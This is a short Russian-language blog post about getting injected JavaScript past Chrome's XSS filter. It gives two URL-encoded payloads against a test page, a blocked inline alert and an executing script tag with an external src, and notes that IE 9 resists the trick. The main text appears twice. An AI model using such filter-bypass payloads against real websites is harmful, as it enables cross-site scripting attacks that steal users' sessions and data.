Вчера писал о проблеме исполнения внедренного кода в Chrome и IE.
Сегодня нашел решение проблемы в Chrome, все оказалось элементарно:
Внедряем конструкцию вида
<script type='text/javascript' src=''></script>
, и что удивительно, код исполняется!
Смотрим результаты двух внедрений
http://digip.info/xss.php?poop=%22%3E%3Cscript%3Ealert(1);%3C/script%3E //блокируется
http://digip.info/xss.php?poop=%22%3E%3Cscript%20type='text/javascript'%20src='http://digip.info/foo'%3E%3C/script%3E //исполняется
К сожалению, а может к счастью в IE 9 такое не прокатывает, буду искать пути =)
Сегодня нашел решение проблемы в Chrome, все оказалось элементарно:
Внедряем конструкцию вида
<script type='text/javascript' src=''></script>
, и что удивительно, код исполняется!
Смотрим результаты двух внедрений
http://digip.info/xss.php?poop=%22%3E%3Cscript%3Ealert(1);%3C/script%3E //блокируется
http://digip.info/xss.php?poop=%22%3E%3Cscript%20type='text/javascript'%20src='http://digip.info/foo'%3E%3C/script%3E //исполняется
К сожалению, а может к счастью в IE 9 такое не прокатывает, буду искать пути =)
No comments:
Post a Comment